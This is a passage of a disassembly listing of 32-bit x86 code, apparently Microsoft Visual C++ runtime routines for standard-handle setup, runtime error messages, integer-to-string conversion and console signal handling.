and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
add edx, ecx
mov [ebp+var_50], edx
mov eax, [ebp+var_50]
mov ecx, [ebp+var_60]
mov edx, [ecx]
mov [eax], edx
mov eax, [ebp+var_50]
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [eax+4], dl
loc_42FD30: ; CODE XREF: sub_42FB10+1C4�j
; sub_42FB10+1D1�j ...
jmp loc_42FCAB
; ---------------------------------------------------------------------------
loc_42FD35: ; CODE XREF: sub_42FB10+98�j
; sub_42FB10+A2�j ...
mov [ebp+var_58], 0
jmp short loc_42FD47
; ---------------------------------------------------------------------------
loc_42FD3E: ; CODE XREF: sub_42FB10:loc_42FE1F�j
mov eax, [ebp+var_58]
add eax, 1
mov [ebp+var_58], eax
loc_42FD47: ; CODE XREF: sub_42FB10+22C�j
cmp [ebp+var_58], 3
jge loc_42FE24
mov ecx, [ebp+var_58]
imul ecx, 24h
mov edx, ds:dword_4F36C0
add edx, ecx
mov [ebp+var_50], edx
mov eax, [ebp+var_50]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_42FE10
mov ecx, [ebp+var_50]
mov byte ptr [ecx+4], 81h
cmp [ebp+var_58], 0
jnz short loc_42FD84
mov [ebp+var_6C], 0FFFFFFF6h
jmp short loc_42FD94
; ---------------------------------------------------------------------------
loc_42FD84: ; CODE XREF: sub_42FB10+269�j
mov edx, [ebp+var_58]
sub edx, 1
neg edx
sbb edx, edx
add edx, 0FFFFFFF5h
mov [ebp+var_6C], edx
loc_42FD94: ; CODE XREF: sub_42FB10+272�j
mov eax, [ebp+var_6C]
push eax
call ds:dword_4F549C ; GetStdHandle
mov [ebp+var_4C], eax
cmp [ebp+var_4C], 0FFFFFFFFh
jz short loc_42FDFF
mov ecx, [ebp+var_4C]
push ecx
call ds:dword_4F5314 ; GetFileType
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jz short loc_42FDFF
mov edx, [ebp+var_50]
mov eax, [ebp+var_4C]
mov [edx], eax
mov ecx, [ebp+var_54]
and ecx, 0FFh
cmp ecx, 2
jnz short loc_42FDE0
mov edx, [ebp+var_50]
mov al, [edx+4]
or al, 40h
mov ecx, [ebp+var_50]
mov [ecx+4], al
jmp short loc_42FDFD
; ---------------------------------------------------------------------------
loc_42FDE0: ; CODE XREF: sub_42FB10+2BE�j
mov edx, [ebp+var_54]
and edx, 0FFh
cmp edx, 3
jnz short loc_42FDFD
mov eax, [ebp+var_50]
mov cl, [eax+4]
or cl, 8
mov edx, [ebp+var_50]
mov [edx+4], cl
loc_42FDFD: ; CODE XREF: sub_42FB10+2CE�j
; sub_42FB10+2DC�j
jmp short loc_42FE0E
; ---------------------------------------------------------------------------
loc_42FDFF: ; CODE XREF: sub_42FB10+295�j
; sub_42FB10+2A8�j
mov eax, [ebp+var_50]
mov cl, [eax+4]
or cl, 40h
mov edx, [ebp+var_50]
mov [edx+4], cl
loc_42FE0E: ; CODE XREF: sub_42FB10:loc_42FDFD�j
jmp short loc_42FE1F
; ---------------------------------------------------------------------------
loc_42FE10: ; CODE XREF: sub_42FB10+258�j
mov eax, [ebp+var_50]
mov cl, [eax+4]
or cl, 80h
mov edx, [ebp+var_50]
mov [edx+4], cl
loc_42FE1F: ; CODE XREF: sub_42FB10:loc_42FE0E�j
jmp loc_42FD3E
; ---------------------------------------------------------------------------
loc_42FE24: ; CODE XREF: sub_42FB10+23B�j
mov eax, ds:dword_4F37C0
push eax
call ds:dword_4F5318 ; LockResource
mov esp, ebp
pop ebp
retn
sub_42FB10 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
mov dword ptr [ebp-8], 0
jmp short loc_42FE58
; ---------------------------------------------------------------------------
loc_42FE4F: ; CODE XREF: _0:loc_42FED2�j
mov eax, [ebp-8]
add eax, 1
mov [ebp-8], eax
loc_42FE58: ; CODE XREF: _0:0042FE4D�j
cmp dword ptr [ebp-8], 40h
jge short loc_42FED7
mov ecx, [ebp-8]
cmp ds:dword_4F36C0[ecx*4], 0
jz short loc_42FED2
mov edx, [ebp-8]
mov eax, ds:dword_4F36C0[edx*4]
mov [ebp-4], eax
jmp short loc_42FE83
; ---------------------------------------------------------------------------
loc_42FE7A: ; CODE XREF: _0:loc_42FEAD�j
mov ecx, [ebp-4]
add ecx, 24h
mov [ebp-4], ecx
loc_42FE83: ; CODE XREF: _0:0042FE78�j
mov edx, [ebp-8]
mov eax, ds:dword_4F36C0[edx*4]
add eax, 480h
cmp [ebp-4], eax
jnb short loc_42FEAF
mov ecx, [ebp-4]
cmp dword ptr [ecx+8], 0
jz short loc_42FEAD
mov edx, [ebp-4]
add edx, 0Ch
push edx
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
loc_42FEAD: ; CODE XREF: _0:0042FE9E�j
jmp short loc_42FE7A
; ---------------------------------------------------------------------------
loc_42FEAF: ; CODE XREF: _0:0042FE95�j
push 2
mov eax, [ebp-8]
mov ecx, ds:dword_4F36C0[eax*4]
push ecx
call sub_41CA10
add esp, 8
mov edx, [ebp-8]
mov ds:dword_4F36C0[edx*4], 0
loc_42FED2: ; CODE XREF: _0:0042FE69�j
jmp loc_42FE4F
; ---------------------------------------------------------------------------
loc_42FED7: ; CODE XREF: _0:0042FE5C�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FEE0 proc near ; CODE XREF: sub_422270+C�p
; sub_4222A0+C�p
push ebp
mov ebp, esp
cmp ds:dword_4F3368, 1
jz short loc_42FEFE
cmp ds:dword_4F3368, 0
jnz short loc_42FF27
cmp ds:dword_451844, 1
jnz short loc_42FF27
loc_42FEFE: ; CODE XREF: sub_42FEE0+A�j
push 0FCh
call sub_42FF30
add esp, 4
cmp ds:dword_4F3528, 0
jz short loc_42FF1A
call ds:dword_4F3528
loc_42FF1A: ; CODE XREF: sub_42FEE0+32�j
push 0FFh
call sub_42FF30
add esp, 4
loc_42FF27: ; CODE XREF: sub_42FEE0+13�j
; sub_42FEE0+1C�j
pop ebp
retn
sub_42FEE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FF30 proc near ; CODE XREF: sub_422270+15�p
; sub_4222A0+15�p ...
var_1B0 = byte ptr -1B0h
var_110 = byte ptr -110h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
push esi
push edi
mov [ebp+var_8], 0
jmp short loc_42FF4E
; ---------------------------------------------------------------------------
loc_42FF45: ; CODE XREF: sub_42FF30:loc_42FF65�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_42FF4E: ; CODE XREF: sub_42FF30+13�j
cmp [ebp+var_8], 12h
jnb short loc_42FF67
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
cmp edx, ds:dword_4543B8[ecx*8]
jnz short loc_42FF65
jmp short loc_42FF67
; ---------------------------------------------------------------------------
loc_42FF65: ; CODE XREF: sub_42FF30+31�j
jmp short loc_42FF45
; ---------------------------------------------------------------------------
loc_42FF67: ; CODE XREF: sub_42FF30+22�j
; sub_42FF30+33�j
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
cmp ecx, ds:dword_4543B8[eax*8]
jnz loc_4300E8
cmp [ebp+arg_0], 0FCh
jz short loc_42FFA4
mov edx, [ebp+var_8]
mov eax, ds:off_4543BC[edx*8]
push eax
push 0
push 0
push 0
push 1
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_42FFA4
int 3 ; Trap to Debugger
loc_42FFA4: ; CODE XREF: sub_42FF30+51�j
; sub_42FF30+71�j
cmp ds:dword_4F3368, 1
jz short loc_42FFBF
cmp ds:dword_4F3368, 0
jnz short loc_42FFF8
cmp ds:dword_451844, 1
jnz short loc_42FFF8
loc_42FFBF: ; CODE XREF: sub_42FF30+7B�j
push 0
lea ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_8]
mov eax, ds:off_4543BC[edx*8]
push eax
call sub_41BC70
add esp, 4
push eax
mov ecx, [ebp+var_8]
mov edx, ds:off_4543BC[ecx*8]
push edx
push 0FFFFFFF4h
call ds:dword_4F549C ; GetStdHandle
push eax
call ds:dword_4F53B4 ; WriteFile
jmp loc_4300E8
; ---------------------------------------------------------------------------
loc_42FFF8: ; CODE XREF: sub_42FF30+84�j
; sub_42FF30+8D�j
cmp [ebp+arg_0], 0FCh
jz loc_4300E8
push 104h
lea eax, [ebp+var_110]
push eax
push 0
call ds:off_4F5344
test eax, eax
jnz short loc_430031
push offset aProgramNameUnk ; "<program name unknown>"
lea ecx, [ebp+var_110]
push ecx
call sub_41F620
add esp, 8
loc_430031: ; CODE XREF: sub_42FF30+EB�j
lea edx, [ebp+var_110]
mov [ebp+var_C], edx
mov eax, [ebp+var_C]
push eax
call sub_41BC70
add esp, 4
add eax, 1
cmp eax, 3Ch
jbe short loc_43007A
lea ecx, [ebp+var_110]
push ecx
call sub_41BC70
add esp, 4
mov edx, [ebp+var_C]
lea eax, [edx+eax-3Bh]
mov [ebp+var_C], eax
push 3
push offset a___ ; "..."
mov ecx, [ebp+var_C]
push ecx
call sub_41E510
add esp, 0Ch
loc_43007A: ; CODE XREF: sub_42FF30+11C�j
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
lea edx, [ebp+var_1B0]
push edx
call sub_41F620
add esp, 8
mov eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_1B0]
push ecx
call sub_41F630
add esp, 8
push offset asc_43CF68 ; "\n\n"
lea edx, [ebp+var_1B0]
push edx
call sub_41F630
add esp, 8
mov eax, [ebp+var_8]
mov ecx, ds:off_4543BC[eax*8]
push ecx
lea edx, [ebp+var_1B0]
push edx
call sub_41F630
add esp, 8
push 12010h
push offset aMicrosoftVis_0 ; "Microsoft Visual C++ Runtime Library"
lea eax, [ebp+var_1B0]
push eax
call sub_430AA0
add esp, 0Ch
loc_4300E8: ; CODE XREF: sub_42FF30+44�j
; sub_42FF30+C3�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42FF30 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov dword ptr [ebp-4], 0
jmp short loc_430106
; ---------------------------------------------------------------------------
loc_4300FD: ; CODE XREF: _0:loc_43011D�j
mov eax, [ebp-4]
add eax, 1
mov [ebp-4], eax
loc_430106: ; CODE XREF: _0:004300FB�j
cmp dword ptr [ebp-4], 12h
jnb short loc_43011F
mov ecx, [ebp-4]
mov edx, [ebp+8]
cmp edx, ds:dword_4543B8[ecx*8]
jnz short loc_43011D
jmp short loc_43011F
; ---------------------------------------------------------------------------
loc_43011D: ; CODE XREF: _0:00430119�j
jmp short loc_4300FD
; ---------------------------------------------------------------------------
loc_43011F: ; CODE XREF: _0:0043010A�j _0:0043011B�j
mov eax, [ebp-4]
mov ecx, [ebp+8]
cmp ecx, ds:dword_4543B8[eax*8]
jnz short loc_43013A
mov edx, [ebp-4]
mov eax, ds:off_4543BC[edx*8]
jmp short loc_43013C
; ---------------------------------------------------------------------------
loc_43013A: ; CODE XREF: _0:0043012C�j
xor eax, eax
loc_43013C: ; CODE XREF: _0:00430138�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430140 proc near ; CODE XREF: sub_422400+13�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
push 2
call sub_423280
add esp, 4
mov [ebp+var_8], 3
jmp short loc_430169
; ---------------------------------------------------------------------------
loc_430160: ; CODE XREF: sub_430140:loc_430204�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_430169: ; CODE XREF: sub_430140+1E�j
mov ecx, [ebp+var_8]
cmp ecx, ds:dword_4F4A20
jge loc_430209
mov edx, [ebp+var_8]
mov eax, ds:dword_4F3A14
cmp dword ptr [eax+edx*4], 0
jz short loc_430204
mov ecx, [ebp+var_8]
mov edx, ds:dword_4F3A14
mov eax, [edx+ecx*4]
mov ecx, [eax+0Ch]
and ecx, 83h
test ecx, ecx
jz short loc_4301C1
mov edx, [ebp+var_8]
mov eax, ds:dword_4F3A14
mov ecx, [eax+edx*4]
push ecx
call sub_41BCF0
add esp, 4
cmp eax, 0FFFFFFFFh
jz short loc_4301C1
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_4301C1: ; CODE XREF: sub_430140+5D�j
; sub_430140+76�j
cmp [ebp+var_8], 14h
jl short loc_430204
mov eax, [ebp+var_8]
mov ecx, ds:dword_4F3A14
mov edx, [ecx+eax*4]
add edx, 20h
push edx
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
push 2
mov eax, [ebp+var_8]
mov ecx, ds:dword_4F3A14
mov edx, [ecx+eax*4]
push edx
call sub_41CA10
add esp, 8
mov eax, [ebp+var_8]
mov ecx, ds:dword_4F3A14
mov dword ptr [ecx+eax*4], 0
loc_430204: ; CODE XREF: sub_430140+44�j
; sub_430140+85�j
jmp loc_430160
; ---------------------------------------------------------------------------
loc_430209: ; CODE XREF: sub_430140+32�j
push 2
call sub_423320
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_430140 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430220 proc near ; CODE XREF: sub_422610+31D�p
; sub_434EB0+1EF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0Ah
jnz short loc_430247
cmp [ebp+arg_0], 0
jge short loc_430247
push 1
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_430270
add esp, 10h
jmp short loc_43025D
; ---------------------------------------------------------------------------
loc_430247: ; CODE XREF: sub_430220+7�j
; sub_430220+D�j
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_430270
add esp, 10h
loc_43025D: ; CODE XREF: sub_430220+25�j
mov eax, [ebp+arg_4]
pop ebp
retn
sub_430220 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430270 proc near ; CODE XREF: sub_430220+1D�p
; sub_430220+35�p ...
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+arg_C], 0
jz short loc_430299
mov ecx, [ebp+var_4]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
neg eax
mov [ebp+arg_0], eax
loc_430299: ; CODE XREF: sub_430270+10�j
mov ecx, [ebp+var_4]
mov [ebp+var_8], ecx
loc_43029F: ; CODE XREF: sub_430270+79�j
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_8]
mov [ebp+var_C], edx
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_8]
mov [ebp+arg_0], eax
cmp [ebp+var_C], 9
jbe short loc_4302D1
mov edx, [ebp+var_C]
add edx, 57h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_4302E5
; ---------------------------------------------------------------------------
loc_4302D1: ; CODE XREF: sub_430270+49�j
mov edx, [ebp+var_C]
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_4302E5: ; CODE XREF: sub_430270+5F�j
cmp [ebp+arg_0], 0
ja short loc_43029F
mov edx, [ebp+var_4]
mov byte ptr [edx], 0
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_4302FA: ; CODE XREF: sub_430270+BC�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [ebp+var_10], dl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_8]
mov cl, [ebp+var_10]
mov [eax], cl
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_4]
jb short loc_4302FA
mov esp, ebp
pop ebp
retn
sub_430270 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+10h], 0Ah
jnz short loc_430359
cmp dword ptr [ebp+8], 0
jge short loc_430359
mov dword ptr [ebp-4], 1
jmp short loc_430360
; ---------------------------------------------------------------------------
loc_430359: ; CODE XREF: _0:00430348�j _0:0043034E�j
mov dword ptr [ebp-4], 0
loc_430360: ; CODE XREF: _0:00430357�j
mov eax, [ebp-4]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_430270
add esp, 10h
mov eax, [ebp+0Ch]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
call sub_430270
add esp, 10h
mov eax, [ebp+0Ch]
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+14h], 0Ah
jnz short loc_4303C1
cmp dword ptr [ebp+0Ch], 0
jg short loc_4303C1
jl short loc_4303B8
cmp dword ptr [ebp+8], 0
jnb short loc_4303C1
loc_4303B8: ; CODE XREF: _0:004303B0�j
mov dword ptr [ebp-4], 1
jmp short loc_4303C8
; ---------------------------------------------------------------------------
loc_4303C1: ; CODE XREF: _0:004303A8�j _0:004303AE�j ...
mov dword ptr [ebp-4], 0
loc_4303C8: ; CODE XREF: _0:004303BF�j
mov eax, [ebp-4]
push eax
mov ecx, [ebp+14h]
push ecx
mov edx, [ebp+10h]
push edx
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_4303F0
mov eax, [ebp+10h]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4303F0 proc near ; CODE XREF: _0:004303DC�p _0:00430505�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
cmp [ebp+arg_10], 0
jz short loc_430424
mov ecx, [ebp+var_4]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
neg eax
mov ecx, [ebp+arg_4]
adc ecx, 0
neg ecx
mov [ebp+arg_0], eax
mov [ebp+arg_4], ecx
loc_430424: ; CODE XREF: sub_4303F0+10�j
mov edx, [ebp+var_4]
mov [ebp+var_8], edx
loc_43042A: ; CODE XREF: sub_4303F0+9F�j
; sub_4303F0+A7�j
mov eax, [ebp+arg_C]
xor ecx, ecx
push ecx
push eax
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_4214F0
mov [ebp+var_C], eax
mov ecx, [ebp+arg_C]
xor edx, edx
push edx
push ecx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_421480
mov [ebp+arg_0], eax
mov [ebp+arg_4], edx
cmp [ebp+var_C], 9
jbe short loc_430477
mov edx, [ebp+var_C]
add edx, 57h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_43048B
; ---------------------------------------------------------------------------
loc_430477: ; CODE XREF: sub_4303F0+6F�j
mov edx, [ebp+var_C]
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_43048B: ; CODE XREF: sub_4303F0+85�j
cmp [ebp+arg_4], 0
ja short loc_43042A
jb short loc_430499
cmp [ebp+arg_0], 0
ja short loc_43042A
loc_430499: ; CODE XREF: sub_4303F0+A1�j
mov edx, [ebp+var_4]
mov byte ptr [edx], 0
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_4304A8: ; CODE XREF: sub_4303F0+EA�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [ebp+var_10], dl
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+var_8]
mov cl, [ebp+var_10]
mov [eax], cl
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_4]
jb short loc_4304A8
mov esp, ebp
pop ebp
retn 14h
sub_4303F0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_4303F0
mov eax, [ebp+10h]
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 10h
push esi
cmp dword ptr [ebp+0Ch], 4
jz short loc_430523
cmp dword ptr [ebp+0Ch], 3
jnz short loc_430528
loc_430523: ; CODE XREF: _0:0043051B�j
jmp loc_4306F8
; ---------------------------------------------------------------------------
loc_430528: ; CODE XREF: _0:00430521�j
cmp dword ptr [ebp+8], 2
jz short loc_430544
cmp dword ptr [ebp+8], 15h
jz short loc_430544
cmp dword ptr [ebp+8], 16h
jz short loc_430544
cmp dword ptr [ebp+8], 0Fh
jnz loc_430621
loc_430544: ; CODE XREF: _0:0043052C�j _0:00430532�j ...
push 1
call sub_423280
add esp, 4
cmp dword ptr [ebp+8], 2
jz short loc_43055A
cmp dword ptr [ebp+8], 15h
jnz short loc_43059F
loc_43055A: ; CODE XREF: _0:00430552�j
cmp ds:dword_4F353C, 0
jnz short loc_43059F
push 1
push offset sub_430740
call ds:dword_4F53F8 ; SetConsoleCtrlHandler
cmp eax, 1
jnz short loc_430581
mov ds:dword_4F353C, 1
jmp short loc_43059F
; ---------------------------------------------------------------------------
loc_430581: ; CODE XREF: _0:00430573�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov esi, eax
call sub_429AA0
mov [eax], esi
push 1
call sub_423320
add esp, 4
jmp loc_4306F8
; ---------------------------------------------------------------------------
loc_43059F: ; CODE XREF: _0:00430558�j _0:00430561�j ...
mov eax, [ebp+8]
mov [ebp-10h], eax
mov ecx, [ebp-10h]
sub ecx, 2
mov [ebp-10h], ecx
cmp dword ptr [ebp-10h], 14h
ja short loc_430612
mov eax, [ebp-10h]
xor edx, edx
mov dl, byte_43071F[eax]
jmp off_43070B[edx*4]
loc_4305C6: ; DATA XREF: _0:off_43070B�o
mov ecx, ds:dword_4F352C
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov ds:dword_4F352C, edx
jmp short loc_430612
; ---------------------------------------------------------------------------
loc_4305DA: ; CODE XREF: _0:004305BF�j
; DATA XREF: _0:00430713�o
mov eax, ds:dword_4F3530
mov [ebp-0Ch], eax
mov ecx, [ebp+0Ch]
mov ds:dword_4F3530, ecx
jmp short loc_430612
; ---------------------------------------------------------------------------
loc_4305ED: ; CODE XREF: _0:004305BF�j
; DATA XREF: _0:00430717�o
mov edx, ds:dword_4F3534
mov [ebp-0Ch], edx
mov eax, [ebp+0Ch]
mov ds:dword_4F3534, eax
jmp short loc_430612
; ---------------------------------------------------------------------------
loc_430600: ; CODE XREF: _0:004305BF�j
; DATA XREF: _0:0043070F�o
mov ecx, ds:dword_4F3538
mov [ebp-0Ch], ecx
mov edx, [ebp+0Ch]
mov ds:dword_4F3538, edx
loc_430612: ; CODE XREF: _0:004305B2�j _0:004305BF�j ...
push 1
call sub_423320
add esp, 4
jmp loc_4306F3
; ---------------------------------------------------------------------------
loc_430621: ; CODE XREF: _0:0043053E�j
cmp dword ptr [ebp+8], 8
jz short loc_430638
cmp dword ptr [ebp+8], 4
jz short loc_430638
cmp dword ptr [ebp+8], 0Bh
jz short loc_430638
jmp loc_4306F8
; ---------------------------------------------------------------------------
loc_430638: ; CODE XREF: _0:00430625�j _0:0043062B�j ...
call sub_428EE0
mov [ebp-4], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], offset dword_454308
jnz short loc_430695
push 133h
push offset aWinsig_c ; "winsig.c"
push 2
mov ecx, ds:dword_454388
push ecx
call sub_41BE70
add esp, 10h
mov edx, [ebp-4]
mov [edx+50h], eax
mov eax, [ebp-4]
cmp dword ptr [eax+50h], 0
jz short loc_430693
mov ecx, ds:dword_454388
push ecx
push offset dword_454308
mov edx, [ebp-4]
mov eax, [edx+50h]
push eax
call sub_41FBF0
add esp, 0Ch
jmp short loc_430695
; ---------------------------------------------------------------------------
loc_430693: ; CODE XREF: _0:00430674�j
jmp short loc_4306F8
; ---------------------------------------------------------------------------
loc_430695: ; CODE XREF: _0:0043064A�j _0:00430691�j
mov ecx, [ebp-4]
mov edx, [ecx+50h]
push edx
mov eax, [ebp+8]
push eax
call sub_430A20
add esp, 8
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_4306B3
jmp short loc_4306F8
; ---------------------------------------------------------------------------
loc_4306B3: ; CODE XREF: _0:004306AF�j
mov ecx, [ebp-8]
mov edx, [ecx+8]
mov [ebp-0Ch], edx
loc_4306BC: ; CODE XREF: _0:loc_4306F1�j
mov eax, [ebp-8]
mov ecx, [eax+4]
cmp ecx, [ebp+8]
jnz short loc_4306F3
mov edx, [ebp-8]
mov eax, [ebp+0Ch]
mov [edx+8], eax
mov ecx, [ebp-8]
add ecx, 0Ch
mov [ebp-8], ecx
mov edx, ds:dword_45438C
imul edx, 0Ch
mov eax, [ebp-4]
mov ecx, [eax+50h]
add ecx, edx
cmp [ebp-8], ecx
jb short loc_4306F1
jmp short loc_4306F3
; ---------------------------------------------------------------------------
loc_4306F1: ; CODE XREF: _0:004306ED�j
jmp short loc_4306BC
; ---------------------------------------------------------------------------
loc_4306F3: ; CODE XREF: _0:0043061C�j _0:004306C5�j ...
mov eax, [ebp-0Ch]
jmp short loc_430706
; ---------------------------------------------------------------------------
loc_4306F8: ; CODE XREF: _0:loc_430523�j
; _0:0043059A�j ...
call sub_429A90
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_430706: ; CODE XREF: _0:004306F6�j
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
off_43070B dd offset loc_4305C6 ; DATA XREF: _0:004305BF�r
dd offset loc_430600
dd offset loc_4305DA
dd offset loc_4305ED
dd offset loc_430612
byte_43071F db 0 ; DATA XREF: _0:004305B9�r
dd 3 dup(4040404h), 4040401h, 3020404h, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430740 proc near ; DATA XREF: _0:00430565�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push 1
call sub_423280
add esp, 4
cmp [ebp+arg_0], 0
jnz short loc_43076E
mov [ebp+var_8], offset dword_4F352C
mov eax, [ebp+var_8]
mov ecx, [eax]
mov [ebp+var_C], ecx
mov [ebp+var_4], 2
jmp short loc_430784
; ---------------------------------------------------------------------------
loc_43076E: ; CODE XREF: sub_430740+14�j
mov [ebp+var_8], offset dword_4F3530
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_C], eax
mov [ebp+var_4], 15h
loc_430784: ; CODE XREF: sub_430740+2C�j
cmp [ebp+var_C], 0
jnz short loc_430798
push 1
call sub_423320
add esp, 4
xor eax, eax
jmp short loc_4307CC
; ---------------------------------------------------------------------------
loc_430798: ; CODE XREF: sub_430740+48�j
cmp [ebp+var_C], 1
jz short loc_4307BD
mov ecx, [ebp+var_8]
mov dword ptr [ecx], 0
push 1
call sub_423320
add esp, 4
mov edx, [ebp+var_4]
push edx
call [ebp+var_C]
add esp, 4
jmp short loc_4307C7
; ---------------------------------------------------------------------------
loc_4307BD: ; CODE XREF: sub_430740+5C�j
push 1
call sub_423320
add esp, 4
loc_4307C7: ; CODE XREF: sub_430740+7B�j
mov eax, 1
loc_4307CC: ; CODE XREF: sub_430740+56�j
mov esp, ebp
pop ebp
retn 4
sub_430740 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4307E0 proc near ; CODE XREF: sub_4229A0+2E7�p
; sub_433010+F�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
